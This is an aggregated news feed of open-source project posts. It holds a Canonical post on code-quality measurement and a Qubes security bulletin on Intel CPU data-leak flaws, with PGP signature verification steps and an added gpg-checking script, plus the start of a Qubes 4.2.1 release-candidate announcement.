<p>The presence of open source software components in regulated industries has accelerated dramatically in the past couple of years and can be found everywhere, from the smallest industrial component to the largest ship in the world. Such a broad application domain brings additional complexity and heightened expectations that we address the evolving need for quality requirements. While language-specific standards were ways to address guidelines in a relatively simple world, this is not enough anymore. Instead, we need to adopt quality models that are not just a compliance requirement, but effectively a way to evaluate the produced engineering components. </p>
<p>While these types of models are often developed in the context of regulated domains in specific industries, they can provide insights that are impactful across a broad range of applications. For instance, <a href="https://www.iso.org/standard/78176.html">ISO 25010</a>, a quality model that is the cornerstone of a product quality evaluation system, is a great framework to help engineers understand the strengths and weaknesses of specific artefacts using static code analysis. By using an objective, reproducible and independent quality model that follows ISO 25010 standard, Canonical can meet the expectations of a broad spectrum of industries and enable the opportunities that open source software brings. </p>
<h2 class="wp-block-heading">Adding independent quality indicators</h2>
<p><a href="https://www.tiobe.com/">TIOBE</a> is supporting Canonical in getting an independent overview of its code quality by checking the reliability, security and maintainability of its software sources. The measurements are based on ISO 25010 and follow a strict procedure defined by <a href="https://www.tiobe.com/quality-models/tqi/">TIOBE’s Quality Indicator</a> (TQI). TIOBE provides real-time data integrated in programming environments and separate dashboards and makes use of best-in-class third party code checkers for Canonical.</p>
<p>Paul Jansen, CEO of TIOBE states: “We are thrilled to contribute to the success of Canonical. After having checked the code quality of a lot of Canonical’s projects in our independent and regulated way, it is clear that Canonical is scoring far above the average of the 8,000+ commercial projects we measure every day”.</p>
<p>At Canonical, we believe that Quality Management (QM) is an essential pillar in the development of open source software. That is why we added TQI as one additional control point across our software development lifecycle process. In most industries, the expectations towards innovation but also quality attributes, including the ones highlighted by TIOBE Quality Indicator, are very high. The integration of open source software with industry-recognised quality models marks a paramount step towards achieving excellence and leading to the production of superior software solutions.</p>
<h2 class="wp-block-heading">Addressing quality management requirements in automotive</h2>
<p>A prime example of the advantages of independent quality indicators can be seen in the automotive industry. This sector, with its high demands for safety and technological innovation, presents unique challenges that require impeccable quality and robust software solutions. As vehicles become increasingly software-defined, integrating open source software with industry-recognised quality models becomes not just beneficial but essential. Quality management works as a driving force – not just ensuring the reliability and safety of vehicles – but also the key building block for generating trust in open source within the automotive industry. </p>
<p>As Canonical’s Automotive Sector Lead, Bertrand Boisseau, explains: “The results of the collaboration with TIOBE are crucial, especially in the realm of Software Defined Vehicles (SDVs), where the abstraction and decoupling of software and hardware development cycles is key. The TIOBE TiCS framework supports our R&D efforts related to automotive, enabling us to go beyond the expectations of this demanding ecosystem”. </p>
<h2 class="wp-block-heading">Conclusion</h2>
<p>Our approach is designed to address the inherent complexity of modern software stacks, which are by nature heterogeneous. We make use of quality models like ISO 25010 as accelerators to enhance our quality management processes. At Canonical, these models are instrumental in enriching our continuous improvement practices with measurable data, while also aligning with the expectations of the broader enterprise landscape, particularly when combined with the openness and transparency open source software provides. </p>
<p>If you have embarked on a similar journey to measure quality management in your organisation, I would love to hear about your experience. If you’re eager to join our mission in advancing precision engineering, please explore our openings starting with the <a href="https://canonical.com/careers/4541445">Technical Manager Automotive and Industrial</a> as well as our <a href="https://canonical.com/careers/5103218">Lead Development Lifecycle Engineer</a> positions. Stay tuned to follow our journey towards engineering excellence and connect with me on <a href="https://www.linkedin.com/in/pierreguillemin/">LinkedIn</a>.</p>Ubuntu developershttp://planet.ubuntu.com/llamafile: A Must-Have Tool in the Age of AIhttps://www.deepin.org/?p=333792024-03-18T06:52:55+00:00In the field of AI, the process of configuring and installing environments for model inference is often a headache. If you have such a problem, then llamafile will be a blessing for you. This article was created by deepin community user "传顺页" to give you a first-hand understanding of how to play around with llamafile! What exactly is llamafile? llamafile is an executable Large Language Model (LLM) that can be run on your own computer, and contains the weights for a given open LLM, as well as everything you need to run the model. Surprisingly, you don't need to ...<a href="https://www.deepin.org/en/llamafile-a-must-have-tool/">Read more</a>aidahttps://www.deepin.org/enUpdate for QSB-101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982)https://www.qubes-os.org/news/2024/03/18/qsb-101-update/2024-03-18T00:00:00+00:00<p><em><strong>Update (2024-03-25):</strong> <a href="https://www.qubes-os.org/feed.xml#marek-marczykowski-g%C3%B3reckis-pgp-signature">Marek Marczykowski-Górecki’s PGP signature</a> is now available.</em></p>
<p>We have updated <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt">Qubes Security Bulletin (QSB) 101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982)</a>. The text of this updated QSB (including a changelog) and its accompanying cryptographic signatures are reproduced below, followed by a general explanation of this announcement and authentication instructions.</p>
<h2 id="qubes-security-bulletin-101">Qubes Security Bulletin 101</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
---===[ Qubes Security Bulletin 101 ]===---

2024-03-12

Register File Data Sampling (XSA-452) and
Intel Processor Return Predictions Advisory (INTEL-SA-00982)

Changelog
----------

2024-03-12: Original QSB
2024-03-17: Add information about INTEL-SA-00982

User action
------------

Continue to update normally [1] in order to receive the security updates
described in the "Patching" section below. No other user action is
required in response to this QSB.

Summary
--------

On 2024-03-12, the Xen Project published XSA-452, "x86: Register File
Data Sampling" [3]:

| Intel have disclosed RFDS, Register File Data Sampling, affecting some
| Atom cores.
|
| This came from internal validation work. There is no information
| provided about how an attacker might go about inferring data from the
| register files.

For more information, see Intel's security advisory. [4]

In addition, Intel published INTEL-SA-00982/CVE-2023-38575 [6] on the
same day:

| Non-transparent sharing of return predictor targets between contexts
| in some Intel® Processors may allow an authorized user to potentially
| enable information disclosure via local access.

Information about this vulnerability is very sparse.

Impact
-------

On systems affected by Register File Data Sampling (RFDS), an attacker
might be able to infer the contents of data previously held in floating
point, vector, and/or integer register files on the same core, including
data from a more privileged context.

On systems affected by INTEL-SA-00982, an attacker might be able to leak
information from other security contexts, but the precise impact is
unclear.

Affected systems
-----------------

At present, Register File Data Sampling (RFDS) is known to affect only
certain Atom cores from Intel. Other Intel CPUs and CPUs from other
hardware vendors are not known to be affected. RFDS affects Atom cores
between the Goldmont and Gracemont microarchitectures. This includes
Alder Lake and Raptor Lake hybrid client systems that have a mix of
Gracemont and other types of cores.

At the time of this writing, Intel has not published information about
which systems INTEL-SA-00982 affects. Systems that are still receiving
microcode updates from Intel [7] and that received a microcode update as
part of the microcode release on 2024-03-12 [5] may be affected, even if
they are not affected by RFDS.

Patching
---------

The following packages contain security updates that address the
vulnerabilities described in this bulletin:

For Qubes 4.1, in dom0:
- Xen packages version 4.14.6-7
- microcode_ctl 2.1-57.qubes1

For Qubes 4.2, in dom0:
- Xen packages version 4.17.3-4
- microcode_ctl 2.1-57.qubes1

These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [2] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [1]

Dom0 must be restarted afterward in order for the updates to take
effect.

If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.

Credits
--------

See the original Xen Security Advisory.

References
-----------

[1] https://www.qubes-os.org/doc/how-to-update/
[2] https://www.qubes-os.org/doc/testing/
[3] https://xenbits.xen.org/xsa/advisory-452.html
[4] https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.html
[5] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/blob/main/releasenote.md#microcode-20240312
[6] https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00982.html
[7] https://www.intel.com/content/www/us/en/support/articles/000022396/processors.html

--
The Qubes Security Team
https://www.qubes-os.org/security/
</code></pre></div></div>
<p><strong>Source:</strong> <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt">https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt</a></p>
<h2 id="marek-marczykowski-góreckis-pgp-signature"><a href="https://www.qubes-os.org/team/#marek-marczykowski-g%C3%B3recki">Marek Marczykowski-Górecki</a>’s PGP signature</h2>
<p><strong>Source:</strong> <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.marmarek">https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.marmarek</a></p>
<h2 id="simon-gaiser-aka-hw42s-pgp-signature"><a href="https://www.qubes-os.org/team/#simon-gaiser-aka-hw42">Simon Gaiser (aka HW42)</a>’s PGP signature</h2>
<p><strong>Source:</strong> <a href="https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.simon">https://github.com/QubesOS/qubes-secpack/blob/345734de68d6994d99f461f26e63a09043d4c09c/QSBs/qsb-101-2024.txt.sig.simon</a></p>
<h2 id="what-is-the-purpose-of-this-announcement">What is the purpose of this announcement?</h2>
<p>The purpose of this announcement is to inform the Qubes community that a new Qubes security bulletin (QSB) has been published.</p>
<h2 id="what-is-a-qubes-security-bulletin-qsb">What is a Qubes security bulletin (QSB)?</h2>
<p>A Qubes security bulletin (QSB) is a security announcement issued by the <a href="https://www.qubes-os.org/security/#qubes-security-team">Qubes security team</a>. A QSB typically provides a summary and impact analysis of one or more recently-discovered software vulnerabilities, including details about patching to address them. For a list of all QSBs, see <a href="https://www.qubes-os.org/security/qsb/">Qubes security bulletins (QSBs)</a>.</p>
<h2 id="why-should-i-care-about-qsbs">Why should I care about QSBs?</h2>
<p>QSBs tell you what actions you must take in order to protect yourself from recently-discovered security vulnerabilities. In most cases, security vulnerabilities are addressed by <a href="https://www.qubes-os.org/doc/how-to-update/">updating normally</a>. However, in some cases, special user action is required. In all cases, the required actions are detailed in QSBs.</p>
<h2 id="what-are-the-pgp-signatures-that-accompany-qsbs">What are the PGP signatures that accompany QSBs?</h2>
<p>A <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy">PGP</a> signature is a cryptographic <a href="https://en.wikipedia.org/wiki/Digital_signature">digital signature</a> made in accordance with the <a href="https://en.wikipedia.org/wiki/Pretty_Good_Privacy#OpenPGP">OpenPGP</a> standard. PGP signatures can be cryptographically verified with programs like <a href="https://gnupg.org/">GNU Privacy Guard (GPG)</a>. The Qubes security team cryptographically signs all QSBs so that Qubes users have a reliable way to check whether QSBs are genuine. The only way to be certain that a QSB is authentic is by verifying its PGP signatures.</p>
<h2 id="why-should-i-care-whether-a-qsb-is-authentic">Why should I care whether a QSB is authentic?</h2>
<p>A forged QSB could deceive you into taking actions that adversely affect the security of your Qubes OS system, such as installing malware or making configuration changes that render your system vulnerable to attack. Falsified QSBs could sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.</p>
<h2 id="how-do-i-verify-the-pgp-signatures-on-a-qsb">How do I verify the PGP signatures on a QSB?</h2>
<p>The following command-line instructions assume a Linux system with <code class="language-plaintext highlighter-rouge">git</code> and <code class="language-plaintext highlighter-rouge">gpg</code> installed. (For Windows and Mac options, see <a href="https://www.qubes-os.org/security/verifying-signatures/#openpgp-software">OpenPGP software</a>.)</p>
<ol>
<li>
<p>Obtain the Qubes Master Signing Key (QMSK), e.g.:</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--fetch-keys</span> https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
<span class="go">gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
</span></code></pre></div> </div>
<p>(For more ways to obtain the QMSK, see <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-the-qubes-master-signing-key">How to import and authenticate the Qubes Master Signing Key</a>.)</p>
</li>
<li>
<p>View the fingerprint of the PGP key you just imported. (Note: <code class="language-plaintext highlighter-rouge">gpg></code> indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--edit-key</span> 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
<span class="gp">gpg (GnuPG) 2.2.27;</span><span class="w"> </span>Copyright <span class="o">(</span>C<span class="o">)</span> 2021 Free Software Foundation, Inc.
<span class="go">This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
</span><span class="gp">gpg></span><span class="w"> </span>fpr
<span class="go">pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
</span></code></pre></div> </div>
</li>
<li>
<p><strong>Important:</strong> At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you <em>must</em> authenticate the QMSK out-of-band. <strong>Do not skip this step!</strong> The standard method is to obtain the QMSK fingerprint from <em>multiple independent sources in several different ways</em> and check to see whether they match the key you just imported. For more information, see <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-the-qubes-master-signing-key">How to import and authenticate the Qubes Master Signing Key</a>.</p>
<p><strong>Tip:</strong> After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.</p>
</li>
<li>
<p>Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with <code class="language-plaintext highlighter-rouge">q</code>.</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">gpg></span><span class="w"> </span>trust
<span class="go">pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
</span><span class="gp">gpg></span><span class="w"> </span>q
</code></pre></div> </div>
</li>
<li>
<p>Use Git to clone the qubes-secpack repo.</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>git clone https://github.com/QubesOS/qubes-secpack.git
<span class="go">Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
</span></code></pre></div> </div>
</li>
<li>
<p>Import the included PGP keys. (See our <a href="https://www.qubes-os.org/security/pack/#pgp-key-policies">PGP key policies</a> for important information about these keys.)</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--import</span> qubes-secpack/keys/<span class="k">*</span>/<span class="k">*</span>
<span class="go">gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
</span></code></pre></div> </div>
</li>
<li>
<p>Verify signed Git tags.</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">cd </span>qubes-secpack/
<span class="gp">$</span><span class="w"> </span>git tag <span class="nt">-v</span> <span class="sb">`</span>git describe<span class="sb">`</span>
<span class="go">object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
</span></code></pre></div> </div>
<p>The exact output will differ, but the final line should always start with <code class="language-plaintext highlighter-rouge">gpg: Good signature from...</code> followed by an appropriate key. The <code class="language-plaintext highlighter-rouge">[full]</code> indicates full trust, which this key inherits in virtue of being validly signed by the QMSK.</p>
</li>
<li>
<p>Verify PGP signatures, e.g.:</p>
<div class="language-shell_session highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">cd </span>QSBs/
<span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
<span class="go">gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
</span><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> qsb-087-2022.txt.sig.simon qsb-087-2022.txt
<span class="go">gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
</span><span class="gp">$</span><span class="w"> </span><span class="nb">cd</span> ../canaries/
<span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> canary-034-2023.txt.sig.marmarek canary-034-2023.txt
<span class="go">gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
</span><span class="gp">$</span><span class="w"> </span>gpg <span class="nt">--verify</span> canary-034-2023.txt.sig.simon canary-034-2023.txt
<span class="go">gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
</span></code></pre></div> </div>
<p>Again, the exact output will differ, but the final line of output from each <code class="language-plaintext highlighter-rouge">gpg --verify</code> command should always start with <code class="language-plaintext highlighter-rouge">gpg: Good signature from...</code> followed by an appropriate key.</p>
</li>
</ol>
<p>For this announcement (QSB-101), the commands are:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gpg --verify qsb-101-2024.txt.sig.marmarek qsb-101-2024.txt
$ gpg --verify qsb-101-2024.txt.sig.simon qsb-101-2024.txt
</code></pre></div></div>
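<p>The check that steps 7 and 8 leave to the eye (a final line starting with <code>gpg: Good signature from...</code>, an appropriate key, and <code>[full]</code>) can also be scripted. The following is an added example, not part of the Qubes announcement or the project's tooling: it reads GnuPG's machine-readable <code>--status-fd</code> output and accepts a detached signature only if it is good, was made by the expected key, and that key is fully or ultimately trusted. The function names and the sample status lines are constructed for illustration; the two fingerprints are the ones shown in the <code>using RSA key</code> lines above.</p>

```shell
#!/bin/sh
# Added example (not Qubes project code): scripted version of the
# "Good signature ... [full]" check from steps 7 and 8.

# Signer fingerprints as shown in the "using RSA key" lines on this page.
MAREK_FPR=2D1771FE4D767EDC76B089FAD655A4F21830E06A
SIMON_FPR=EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490

# check_status EXPECTED_FPR
# Reads `gpg --status-fd` lines on stdin. Succeeds only if exactly one good
# signature is reported, it was made by EXPECTED_FPR (signing key or its
# primary key), and the key validity is full or ultimate, i.e. it chains
# to a QMSK that was authenticated and trusted in steps 3 and 4.
check_status() {
    awk -v want="$1" '
        $1 != "[GNUPG:]" { next }
        $2 == "GOODSIG"  { good++ }
        # VALIDSIG: field 3 is the signing key, the last field its primary key.
        # Appending "" forces a string comparison of the hex fingerprints.
        $2 == "VALIDSIG" && (($3 "") == want || ($NF "") == want) { valid = 1 }
        $2 == "TRUST_FULLY" || $2 == "TRUST_ULTIMATE" { trusted = 1 }
        $2 ~ /^(BADSIG|ERRSIG|EXPSIG|EXPKEYSIG|REVKEYSIG)$/ { bad = 1 }
        END {
            ok = (good == 1 && valid && trusted && !bad)
            exit(ok ? 0 : 1)
        }
    '
}

# verify_detached EXPECTED_FPR SIGFILE DATAFILE
# Status lines go to stdout (fd 1); the human-readable log on stderr is dropped.
# A missing gpg binary or missing file yields no status lines, so the check fails.
verify_detached() {
    gpg --batch --status-fd 1 --verify "$2" "$3" 2>/dev/null | check_status "$1"
}

# verify_qsb FILE, e.g. `verify_qsb qsb-101-2024.txt` inside qubes-secpack/QSBs/.
# Both team members' signatures must pass.
verify_qsb() {
    verify_detached "$MAREK_FPR" "$1.sig.marmarek" "$1" &&
    verify_detached "$SIMON_FPR" "$1.sig.simon" "$1"
}

# sample_status FPR TRUST_KEYWORD
# Constructed status output for offline testing (not captured from a real run;
# the date and timestamp are made up).
sample_status() {
    keyid=$(printf '%s' "$1" | cut -c25-40)   # long key ID = last 16 hex digits
    printf '%s\n' \
        "[GNUPG:] NEWSIG" \
        "[GNUPG:] GOODSIG $keyid Constructed User ID" \
        "[GNUPG:] VALIDSIG $1 2024-03-17 1710633600 0 4 0 1 10 00 $1" \
        "[GNUPG:] $2 0 pgp"
}
```

A key that was imported but never tied to an authenticated QMSK produces <code>TRUST_UNDEFINED</code> and is rejected here, which is the situation the out-of-band authentication in step 3 exists to prevent.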
<p>You can also verify the signatures directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the QSB-101 text into a plain text file and do the same for both signature files. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.</p>Qubeshttps://www.qubes-os.org/Qubes OS 4.2.1-rc1 is available for testinghttps://www.qubes-os.org/news/2024/03/16/qubes-os-4-2-1-rc1-available-for-testing/2024-03-16T00:00:00+00:00<p>We’re pleased to announce that the first <a href="https://www.qubes-os.org/feed.xml#what-is-a-release-candidate">release candidate (RC)</a> for Qubes OS 4.2.1 is now available for <a href="https://www.qubes-os.org/doc/testing/">testing</a>. This <a href="https://www.qubes-os.org/feed.xml#what-is-a-patch-release">patch release</a> aims to consolidate all the security patches, bug fixes, and other updates that have occurred since the release of Qubes 4.2.0. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO. The ISO and associated <a href="https://www.qubes-os.org/security/verifying-signatures/">verification files</a> are available on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page. For more information about the changes included in this version, see the <a href="https://github.com/QubesOS/qubes-issues/issues?q=is%3Aissue+is%3Aclosed+reason%3Acompleted+closed%3A2023-12-18..2024-03-14+-label%3A%22R%3A+cannot+reproduce%22+-label%3A%22R%3A+declined%22+-label%3A%22R%3A+duplicate%22+-label%3A%22R%3A+not+applicable%22+-label%3A%22R%3A+self-closed%22+-label%3A%22R%3A+upstream+issue%22+">full list of issues completed since the release of 4.2.0</a>.</p>
<h2 id="when-is-the-stable-release">When is the stable release?</h2>
<p>That depends on the number of bugs discovered in this RC and their severity. As explained in our <a href="https://www.qubes-os.org/doc/version-scheme/#release-schedule">release schedule</a> documentation, our usual process after issuing a new RC is to collect bug reports, triage the bugs, and fix them. If warranted, we then issue a new RC that includes the fixes and repeat the process. We continue this iterative procedure until we’re left with an RC that’s good enough to be declared the stable release. No one can predict, at the outset, how many iterations will be required (and hence how many RCs will be needed before a stable release), but we tend to get a clearer picture of this as testing progresses. Here is the latest update:</p>
<p>At this point, we expect the stable release sometime around 2024-03-25.</p>
<h2 id="testing-qubes-421-rc1">Testing Qubes 4.2.1-rc1</h2>
<p>If you’re willing to <a href="https://www.qubes-os.org/doc/testing/">test</a> this new RC, you can help us improve the eventual stable release by <a href="https://www.qubes-os.org/doc/issue-tracking/">reporting any bugs you encounter</a>. We encourage experienced users to join the <a href="https://forum.qubes-os.org/t/joining-the-testing-team/5190">testing team</a>. The best way to test Qubes 4.2.1-rc1 is by performing a <a href="https://www.qubes-os.org/doc/installation-guide/">clean installation</a> with the new ISO. We strongly recommend <a href="https://www.qubes-os.org/doc/how-to-back-up-restore-and-migrate/">making a full backup</a> beforehand.</p>
<p>As an alternative to a clean installation, there is also the option of performing an in-place upgrade without reinstalling. However, since Qubes 4.2.1 is simply Qubes 4.2.0 inclusive of all updates to date, this amounts to simply using a fully-updated 4.2.0 installation. In a sense, then, all current 4.2.0 users who are keeping up with updates are already testing 4.2.1-rc1, but this testing is only partial, since it does not cover things like the installation procedure.</p>
<h2 id="reminder-new-signing-key-for-qubes-os-42">Reminder: new signing key for Qubes OS 4.2</h2>
<p>As a reminder, we published the following special announcement in <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">Qubes Canary 032</a> on 2022-09-14:</p>
<blockquote>
<p>We plan to create a new Release Signing Key (RSK) for Qubes OS 4.2. Normally, we have only one RSK for each major release. However, for the 4.2 release, we will be using Qubes Builder version 2, which is a complete rewrite of the Qubes Builder. Out of an abundance of caution, we would like to isolate the build processes of the current stable 4.1 release and the upcoming 4.2 release from each other at the cryptographic level in order to minimize the risk of a vulnerability in one affecting the other. We are including this notice as a canary special announcement since introducing a new RSK for a minor release is an exception to our usual RSK management policy.</p>
</blockquote>
<p>As always, we encourage you to <a href="https://www.qubes-os.org/security/pack/#how-to-obtain-and-authenticate">authenticate</a> this canary by <a href="https://www.qubes-os.org/security/verifying-signatures/">verifying its PGP signatures</a>. Specific instructions are also included in the <a href="https://www.qubes-os.org/news/2022/09/14/canary-032/">canary announcement</a>.</p>
<p>As with all Qubes signing keys, we also encourage you to <a href="https://www.qubes-os.org/security/verifying-signatures/#how-to-import-and-authenticate-release-signing-keys">authenticate</a> the new Qubes OS Release 4.2 Signing Key, which is available in the <a href="https://www.qubes-os.org/security/pack/">Qubes Security Pack (qubes-secpack)</a> as well as on the <a href="https://www.qubes-os.org/downloads/">downloads</a> page.</p>
<h2 id="what-is-a-release-candidate">What is a release candidate?</h2>
<p>A release candidate (RC) is a software build that has the potential to become a stable release, unless significant bugs are discovered in testing. RCs are intended for more advanced (or adventurous!) users who are comfortable testing early versions of software that are potentially buggier than stable releases. You can read more about Qubes OS <a href="https://www.qubes-os.org/doc/supported-releases/">supported releases</a> and the <a href="https://www.qubes-os.org/doc/version-scheme/">version scheme</a> in our documentation.</p>
<h2 id="what-is-a-patch-release">What is a patch release?</h2>
